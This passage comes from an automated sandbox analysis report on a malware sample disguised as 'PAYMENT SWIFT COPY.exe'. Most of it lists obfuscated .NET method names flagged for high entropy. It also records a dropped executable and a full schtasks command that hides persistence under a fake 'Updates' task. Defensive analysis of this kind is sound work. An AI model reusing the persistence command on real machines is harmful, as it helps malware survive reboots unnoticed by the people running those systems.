                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, F1hoFycFM5Y5Ngw3fwx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CChXPcG3kU', 'eQXX2txWSn', 'vdVXsTtvOD', 'FyBXXMlxY3', 'eA9XNViZ5p', 'HokXUnCUH3', 'fA1XJBh6Eq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PJXovGTZAcp6iKichi.csHigh entropy of concatenated method names: 'kwbbd09QKg', 'EP3bkqVT6J', 'uu1bY0OdlA', 'mMEbL2GNTc', 'O3tbBFJl1Q', 'hElbD9ofg7', 'JJAbK7uFvG', 'wD5bWk5f97', 'D5QbFB7jUk', 'dV0b57A6bA'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.csHigh entropy of concatenated method names: 'mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372', 'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, OMT594dTSdtC6Vaito.csHigh entropy of concatenated method names: 'aaktuvIXvY', 'vYVt1cvfHJ', 'lOOtyvauoi', 'lysyTjZEKr', 'Hjoyz9jJOn', 'z06tChJPDp', 'AI0tGFPYam', 'CMdtSyVyd2', 'DeStoPBSH5', 'oc4tZe4WgC'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, FV0I8Vujxc8EO1wcj8.csHigh entropy of concatenated method names: 'wfU7FpByET', 'dp57ixCcu8', 'zPZ7ATsxfJ', 'YBh78VL9d1', 'sLi7LwY1AD', 'p8c7qYhvnP', 'yAu7BbYuPV', 'YG77DBfmv8', 'M2t7x5Gkqp', 'lLQ7KUb4GQ'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, swhIR3rP3Gdh5C91vH.csHigh entropy of concatenated method names: 'zb4P78he0v', 'CtMP6OqMxX', 'kJNPPpnWux', 'PTmPsmb4Br', 'lSoPNoCuIn', 'oAyPJjBnB5', 'Dispose', 'TJBgu21IWN', 'L5LgEHrCoK', 's16g195FEo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, T8S8QdndXjceh7mGiN.csHigh entropy of concatenated method names: 'OEha9AGqa', 'hKmc3Gcea', 'QLTM3WmlK', 'Sil0gMUPV', 'oDKkLCb7P', 'SxNpWr5Qd', 'xnSDAbbWFlocjQYTX4', 'iBg5gCNZHsciZS4Fpd', 'KqggGtaTU', 'bbe2CkRjL'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, ykgIq6WG7bv9a2stL3.csHigh entropy of concatenated method names: 'lbyyf955uJ', 'Xt2yE9Eseo', 'TDTyrmN9DS', 'yl9ytuYklq', 'hUXyRJ1DXy', 'mlsrnJ1Npi', 'dLnrwcpfpp', 'WHkr9wMYLf', 'luLrOYrrM9', 'HNLrhsUe0L'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, gEvhqmKVs6HnbMfB1g.csHigh entropy of concatenated method names: 'Kf621BA7wa', 'wwK2rvHDM7', 'hYx2yv0U3k', 'wMm2tr0P5c', 'BcM2PvAiVy', 'xYS2R6MXib', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PP4QjQzKR5XbP7jByn.csHigh entropy of concatenated method names: 'IJP2MbOiBh', 'BQy2dDpbOP', 'uND2kbPPVU', 'yEG2YqPME9', 'L4M2LsgvSt', 'zU12BacwMv', 'ASF2DfdCoG', 'aaa2JhRlHZ', 'Vu42mVjJy8', 'cQs2vx7YeE'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, Bq0dAq6yru0GTY6We8.csHigh entropy of concatenated method names: 'Dispose', 'RvRGhHLAsg', 'OksSLA1yTO', 'h1UXn5wZ4T', 'HmkGT8HGIb', 'djNGz3rGfQ', 'ProcessDialogKey', 'tl8SCclk5h', 'avwSGIOvMT', 'TW6SS3ADXc'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, ISRQMalEKfR4LIwPe7.csHigh entropy of concatenated method names: 'Wff1cthM4q', 'p801MNrpqB', 'w5T1diN3vd', 'bk91kxawV7', 'GOB17OCFW9', 'jjB1VDMQIa', 'yxf16AXp5D', 'be31g6FjJV', 'eSl1PxHiob', 'zh512BcFVu'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, avQnqLFlTekH9ll8IC.csHigh entropy of concatenated method names: 'J1IGt8Fq9I', 'isWGRUE1T0', 'b0hGlTJpac', 'VwRGjdqjuP', 'CHXG7EVpCa', 'e60GVBKnSR', 'YlCrG1jcLtHTEx3ZwA', 'r7WRmIq24ZjPVeGSC7', 'eryPcuITIWhkf2mrVp', 'riAGGi9num'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.csHigh entropy of concatenated method names: 'yNPEAlaFOg', 'OXGE8AsuAr', 'qtWEQD41ZH', 'ypaEHEiE6F', 'l6GEnXRfwX', 'PBKEwIsd34', 'uMpE9JwSJG', 'eBWEOQqC1F', 'CGBEhG1wc1', 'yEQETloY7c'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, inHljhc5ZR0P7coXGSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giA25YDRyL', 'ICt2ikkCNQ', 'NDy2eNn1TP', 'iMt2AdsNjl', 'ty028VYdwR', 'xIl2QatxOn', 'u0E2HyevW7'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, xS9NrZ97ogRYEea3oV.csHigh entropy of concatenated method names: 'wlVtm4M6sZ', 'dectvBVcQC', 'RyKta61fU9', 'jdStcgON40', 'dC0tIKb7Tc', 'RHftMlP1Ze', 'm69t06c8nQ', 'ksTtduLkxh', 'Nlqtk5ZpUO', 'DlvtpEHRpq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, EgUlpqHfqSfLHYoWk0.csHigh entropy of concatenated method names: 'Y8VrImx7m7', 'xRTr0nnO4U', 'ful1qtJZIS', 'Y4A1B5Ci3u', 'gdX1D6PcN0', 'Cud1xjWDJs', 'LiT1KtjKMj', 'wGw1WwAju2', 'bsJ14ueFQa', 'jgq1Frd9jt'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, kiljDFtHHOnR21nEXp.csHigh entropy of concatenated method names: 'r9K6O6ZvSe', 'fIt6Ts8mIS', 'iGZgCFT2Um', 'DZFgG4v91j', 'FDG650TbnB', 'xOr6ihdgEO', 'LIw6ejVouq', 'zpN6A8skXZ', 'Pe068SsMa1', 'kq06QYbnjo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PJvA2ZccqpmGc96co5h.csHigh entropy of concatenated method names: 'd8c2TdZBDG', 'SCX2zI9IXg', 'AncsC2c4hg', 'aNcsGICCin', 'bOasSNHcoj', 'nM6soW6Xil', 'fDrsZMDVte', 'sbAsfQFXeX', 'dXXsushsmT', 'IIEsEqV00Z'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PiHwiKeblEXxf6olbN.csHigh entropy of concatenated method names: 'ToString', 'sRpV53eGe6', 'mKqVLZS7g8', 'TyfVqiC8nc', 'XvfVBNIOhx', 'GQ8VDWWNYu', 'nDyVxQoTZS', 'e81VKjc9U2', 'ea0VWjV7gd', 'rewV4d9EoN'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, T63F1I1LuuP7kaS84r.csHigh entropy of concatenated method names: 'dBtPY7TBDy', 'mnBPLXei57', 'TNnPqad45m', 'G0KPBvnSEd', 'C9RPD23EcG', 'KkJPxf2BKr', 'ThmPKsUc5N', 'D4WPWOpkFN', 'kLiP4fnMtj', 'ublPFC1TKX'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, Up5iKfZCk0jSbBntEh.csHigh entropy of concatenated method names: 'JXQ6lJyNGr', 'W176jDIcwh', 'ToString', 'ztm6uuktfD', 'C2b6EVSBNN', 'Wh961gHEkk', 'onO6rbTDPY', 'SJ16ykbOgp', 'gEN6ttxe4B', 'ked6RbeA8A'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, F1hoFycFM5Y5Ngw3fwx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CChXPcG3kU', 'eQXX2txWSn', 'vdVXsTtvOD', 'FyBXXMlxY3', 'eA9XNViZ5p', 'HokXUnCUH3', 'fA1XJBh6Eq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PJXovGTZAcp6iKichi.csHigh entropy of concatenated method names: 'kwbbd09QKg', 'EP3bkqVT6J', 'uu1bY0OdlA', 'mMEbL2GNTc', 'O3tbBFJl1Q', 'hElbD9ofg7', 'JJAbK7uFvG', 'wD5bWk5f97', 'D5QbFB7jUk', 'dV0b57A6bA'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.csHigh entropy of concatenated method names: 'mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372', 'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, OMT594dTSdtC6Vaito.csHigh entropy of concatenated method names: 'aaktuvIXvY', 'vYVt1cvfHJ', 'lOOtyvauoi', 'lysyTjZEKr', 'Hjoyz9jJOn', 'z06tChJPDp', 'AI0tGFPYam', 'CMdtSyVyd2', 'DeStoPBSH5', 'oc4tZe4WgC'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, FV0I8Vujxc8EO1wcj8.csHigh entropy of concatenated method names: 'wfU7FpByET', 'dp57ixCcu8', 'zPZ7ATsxfJ', 'YBh78VL9d1', 'sLi7LwY1AD', 'p8c7qYhvnP', 'yAu7BbYuPV', 'YG77DBfmv8', 'M2t7x5Gkqp', 'lLQ7KUb4GQ'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, swhIR3rP3Gdh5C91vH.csHigh entropy of concatenated method names: 'zb4P78he0v', 'CtMP6OqMxX', 'kJNPPpnWux', 'PTmPsmb4Br', 'lSoPNoCuIn', 'oAyPJjBnB5', 'Dispose', 'TJBgu21IWN', 'L5LgEHrCoK', 's16g195FEo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, T8S8QdndXjceh7mGiN.csHigh entropy of concatenated method names: 'OEha9AGqa', 'hKmc3Gcea', 'QLTM3WmlK', 'Sil0gMUPV', 'oDKkLCb7P', 'SxNpWr5Qd', 'xnSDAbbWFlocjQYTX4', 'iBg5gCNZHsciZS4Fpd', 'KqggGtaTU', 'bbe2CkRjL'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, ykgIq6WG7bv9a2stL3.csHigh entropy of concatenated method names: 'lbyyf955uJ', 'Xt2yE9Eseo', 'TDTyrmN9DS', 'yl9ytuYklq', 'hUXyRJ1DXy', 'mlsrnJ1Npi', 'dLnrwcpfpp', 'WHkr9wMYLf', 'luLrOYrrM9', 'HNLrhsUe0L'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, gEvhqmKVs6HnbMfB1g.csHigh entropy of concatenated method names: 'Kf621BA7wa', 'wwK2rvHDM7', 'hYx2yv0U3k', 'wMm2tr0P5c', 'BcM2PvAiVy', 'xYS2R6MXib', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PP4QjQzKR5XbP7jByn.csHigh entropy of concatenated method names: 'IJP2MbOiBh', 'BQy2dDpbOP', 'uND2kbPPVU', 'yEG2YqPME9', 'L4M2LsgvSt', 'zU12BacwMv', 'ASF2DfdCoG', 'aaa2JhRlHZ', 'Vu42mVjJy8', 'cQs2vx7YeE'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, Bq0dAq6yru0GTY6We8.csHigh entropy of concatenated method names: 'Dispose', 'RvRGhHLAsg', 'OksSLA1yTO', 'h1UXn5wZ4T', 'HmkGT8HGIb', 'djNGz3rGfQ', 'ProcessDialogKey', 'tl8SCclk5h', 'avwSGIOvMT', 'TW6SS3ADXc'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, ISRQMalEKfR4LIwPe7.csHigh entropy of concatenated method names: 'Wff1cthM4q', 'p801MNrpqB', 'w5T1diN3vd', 'bk91kxawV7', 'GOB17OCFW9', 'jjB1VDMQIa', 'yxf16AXp5D', 'be31g6FjJV', 'eSl1PxHiob', 'zh512BcFVu'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, avQnqLFlTekH9ll8IC.csHigh entropy of concatenated method names: 'J1IGt8Fq9I', 'isWGRUE1T0', 'b0hGlTJpac', 'VwRGjdqjuP', 'CHXG7EVpCa', 'e60GVBKnSR', 'YlCrG1jcLtHTEx3ZwA', 'r7WRmIq24ZjPVeGSC7', 'eryPcuITIWhkf2mrVp', 'riAGGi9num'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, N13ITUDLcClkUqkPFe.csHigh entropy of concatenated method names: 'yNPEAlaFOg', 'OXGE8AsuAr', 'qtWEQD41ZH', 'ypaEHEiE6F', 'l6GEnXRfwX', 'PBKEwIsd34', 'uMpE9JwSJG', 'eBWEOQqC1F', 'CGBEhG1wc1', 'yEQETloY7c'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, inHljhc5ZR0P7coXGSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giA25YDRyL', 'ICt2ikkCNQ', 'NDy2eNn1TP', 'iMt2AdsNjl', 'ty028VYdwR', 'xIl2QatxOn', 'u0E2HyevW7'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, xS9NrZ97ogRYEea3oV.csHigh entropy of concatenated method names: 'wlVtm4M6sZ', 'dectvBVcQC', 'RyKta61fU9', 'jdStcgON40', 'dC0tIKb7Tc', 'RHftMlP1Ze', 'm69t06c8nQ', 'ksTtduLkxh', 'Nlqtk5ZpUO', 'DlvtpEHRpq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, EgUlpqHfqSfLHYoWk0.csHigh entropy of concatenated method names: 'Y8VrImx7m7', 'xRTr0nnO4U', 'ful1qtJZIS', 'Y4A1B5Ci3u', 'gdX1D6PcN0', 'Cud1xjWDJs', 'LiT1KtjKMj', 'wGw1WwAju2', 'bsJ14ueFQa', 'jgq1Frd9jt'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, kiljDFtHHOnR21nEXp.csHigh entropy of concatenated method names: 'r9K6O6ZvSe', 'fIt6Ts8mIS', 'iGZgCFT2Um', 'DZFgG4v91j', 'FDG650TbnB', 'xOr6ihdgEO', 'LIw6ejVouq', 'zpN6A8skXZ', 'Pe068SsMa1', 'kq06QYbnjo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PJvA2ZccqpmGc96co5h.csHigh entropy of concatenated method names: 'd8c2TdZBDG', 'SCX2zI9IXg', 'AncsC2c4hg', 'aNcsGICCin', 'bOasSNHcoj', 'nM6soW6Xil', 'fDrsZMDVte', 'sbAsfQFXeX', 'dXXsushsmT', 'IIEsEqV00Z'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PiHwiKeblEXxf6olbN.csHigh entropy of concatenated method names: 'ToString', 'sRpV53eGe6', 'mKqVLZS7g8', 'TyfVqiC8nc', 'XvfVBNIOhx', 'GQ8VDWWNYu', 'nDyVxQoTZS', 'e81VKjc9U2', 'ea0VWjV7gd', 'rewV4d9EoN'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, T63F1I1LuuP7kaS84r.csHigh entropy of concatenated method names: 'dBtPY7TBDy', 'mnBPLXei57', 'TNnPqad45m', 'G0KPBvnSEd', 'C9RPD23EcG', 'KkJPxf2BKr', 'ThmPKsUc5N', 'D4WPWOpkFN', 'kLiP4fnMtj', 'ublPFC1TKX'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, Up5iKfZCk0jSbBntEh.csHigh entropy of concatenated method names: 'JXQ6lJyNGr', 'W176jDIcwh', 'ToString', 'ztm6uuktfD', 'C2b6EVSBNN', 'Wh961gHEkk', 'onO6rbTDPY', 'SJ16ykbOgp', 'gEN6ttxe4B', 'ked6RbeA8A'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, F1hoFycFM5Y5Ngw3fwx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CChXPcG3kU', 'eQXX2txWSn', 'vdVXsTtvOD', 'FyBXXMlxY3', 'eA9XNViZ5p', 'HokXUnCUH3', 'fA1XJBh6Eq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, PJXovGTZAcp6iKichi.csHigh entropy of concatenated method names: 'kwbbd09QKg', 'EP3bkqVT6J', 'uu1bY0OdlA', 'mMEbL2GNTc', 'O3tbBFJl1Q', 'hElbD9ofg7', 'JJAbK7uFvG', 'wD5bWk5f97', 'D5QbFB7jUk', 'dV0b57A6bA'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.csHigh entropy of concatenated method names: 'mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372', 'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, OMT594dTSdtC6Vaito.csHigh entropy of concatenated method names: 'aaktuvIXvY', 'vYVt1cvfHJ', 'lOOtyvauoi', 'lysyTjZEKr', 'Hjoyz9jJOn', 'z06tChJPDp', 'AI0tGFPYam', 'CMdtSyVyd2', 'DeStoPBSH5', 'oc4tZe4WgC'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, FV0I8Vujxc8EO1wcj8.csHigh entropy of concatenated method names: 'wfU7FpByET', 'dp57ixCcu8', 'zPZ7ATsxfJ', 'YBh78VL9d1', 'sLi7LwY1AD', 'p8c7qYhvnP', 'yAu7BbYuPV', 'YG77DBfmv8', 'M2t7x5Gkqp', 'lLQ7KUb4GQ'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, swhIR3rP3Gdh5C91vH.csHigh entropy of concatenated method names: 'zb4P78he0v', 'CtMP6OqMxX', 'kJNPPpnWux', 'PTmPsmb4Br', 'lSoPNoCuIn', 'oAyPJjBnB5', 'Dispose', 'TJBgu21IWN', 'L5LgEHrCoK', 's16g195FEo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, T8S8QdndXjceh7mGiN.csHigh entropy of concatenated method names: 'OEha9AGqa', 'hKmc3Gcea', 'QLTM3WmlK', 'Sil0gMUPV', 'oDKkLCb7P', 'SxNpWr5Qd', 'xnSDAbbWFlocjQYTX4', 'iBg5gCNZHsciZS4Fpd', 'KqggGtaTU', 'bbe2CkRjL'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, ykgIq6WG7bv9a2stL3.csHigh entropy of concatenated method names: 'lbyyf955uJ', 'Xt2yE9Eseo', 'TDTyrmN9DS', 'yl9ytuYklq', 'hUXyRJ1DXy', 'mlsrnJ1Npi', 'dLnrwcpfpp', 'WHkr9wMYLf', 'luLrOYrrM9', 'HNLrhsUe0L'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, gEvhqmKVs6HnbMfB1g.csHigh entropy of concatenated method names: 'Kf621BA7wa', 'wwK2rvHDM7', 'hYx2yv0U3k', 'wMm2tr0P5c', 'BcM2PvAiVy', 'xYS2R6MXib', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, PP4QjQzKR5XbP7jByn.csHigh entropy of concatenated method names: 'IJP2MbOiBh', 'BQy2dDpbOP', 'uND2kbPPVU', 'yEG2YqPME9', 'L4M2LsgvSt', 'zU12BacwMv', 'ASF2DfdCoG', 'aaa2JhRlHZ', 'Vu42mVjJy8', 'cQs2vx7YeE'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, Bq0dAq6yru0GTY6We8.csHigh entropy of concatenated method names: 'Dispose', 'RvRGhHLAsg', 'OksSLA1yTO', 'h1UXn5wZ4T', 'HmkGT8HGIb', 'djNGz3rGfQ', 'ProcessDialogKey', 'tl8SCclk5h', 'avwSGIOvMT', 'TW6SS3ADXc'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, ISRQMalEKfR4LIwPe7.csHigh entropy of concatenated method names: 'Wff1cthM4q', 'p801MNrpqB', 'w5T1diN3vd', 'bk91kxawV7', 'GOB17OCFW9', 'jjB1VDMQIa', 'yxf16AXp5D', 'be31g6FjJV', 'eSl1PxHiob', 'zh512BcFVu'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, avQnqLFlTekH9ll8IC.csHigh entropy of concatenated method names: 'J1IGt8Fq9I', 'isWGRUE1T0', 'b0hGlTJpac', 'VwRGjdqjuP', 'CHXG7EVpCa', 'e60GVBKnSR', 'YlCrG1jcLtHTEx3ZwA', 'r7WRmIq24ZjPVeGSC7', 'eryPcuITIWhkf2mrVp', 'riAGGi9num'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, N13ITUDLcClkUqkPFe.csHigh entropy of concatenated method names: 'yNPEAlaFOg', 'OXGE8AsuAr', 'qtWEQD41ZH', 'ypaEHEiE6F', 'l6GEnXRfwX', 'PBKEwIsd34', 'uMpE9JwSJG', 'eBWEOQqC1F', 'CGBEhG1wc1', 'yEQETloY7c'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, inHljhc5ZR0P7coXGSS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giA25YDRyL', 'ICt2ikkCNQ', 'NDy2eNn1TP', 'iMt2AdsNjl', 'ty028VYdwR', 'xIl2QatxOn', 'u0E2HyevW7'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, xS9NrZ97ogRYEea3oV.csHigh entropy of concatenated method names: 'wlVtm4M6sZ', 'dectvBVcQC', 'RyKta61fU9', 'jdStcgON40', 'dC0tIKb7Tc', 'RHftMlP1Ze', 'm69t06c8nQ', 'ksTtduLkxh', 'Nlqtk5ZpUO', 'DlvtpEHRpq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, EgUlpqHfqSfLHYoWk0.csHigh entropy of concatenated method names: 'Y8VrImx7m7', 'xRTr0nnO4U', 'ful1qtJZIS', 'Y4A1B5Ci3u', 'gdX1D6PcN0', 'Cud1xjWDJs', 'LiT1KtjKMj', 'wGw1WwAju2', 'bsJ14ueFQa', 'jgq1Frd9jt'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, kiljDFtHHOnR21nEXp.csHigh entropy of concatenated method names: 'r9K6O6ZvSe', 'fIt6Ts8mIS', 'iGZgCFT2Um', 'DZFgG4v91j', 'FDG650TbnB', 'xOr6ihdgEO', 'LIw6ejVouq', 'zpN6A8skXZ', 'Pe068SsMa1', 'kq06QYbnjo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, PJvA2ZccqpmGc96co5h.csHigh entropy of concatenated method names: 'd8c2TdZBDG', 'SCX2zI9IXg', 'AncsC2c4hg', 'aNcsGICCin', 'bOasSNHcoj', 'nM6soW6Xil', 'fDrsZMDVte', 'sbAsfQFXeX', 'dXXsushsmT', 'IIEsEqV00Z'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, PiHwiKeblEXxf6olbN.csHigh entropy of concatenated method names: 'ToString', 'sRpV53eGe6', 'mKqVLZS7g8', 'TyfVqiC8nc', 'XvfVBNIOhx', 'GQ8VDWWNYu', 'nDyVxQoTZS', 'e81VKjc9U2', 'ea0VWjV7gd', 'rewV4d9EoN'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, T63F1I1LuuP7kaS84r.csHigh entropy of concatenated method names: 'dBtPY7TBDy', 'mnBPLXei57', 'TNnPqad45m', 'G0KPBvnSEd', 'C9RPD23EcG', 'KkJPxf2BKr', 'ThmPKsUc5N', 'D4WPWOpkFN', 'kLiP4fnMtj', 'ublPFC1TKX'
                Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, Up5iKfZCk0jSbBntEh.csHigh entropy of concatenated method names: 'JXQ6lJyNGr', 'W176jDIcwh', 'ToString', 'ztm6uuktfD', 'C2b6EVSBNN', 'Wh961gHEkk', 'onO6rbTDPY', 'SJ16ykbOgp', 'gEN6ttxe4B', 'ked6RbeA8A'
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeFile created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
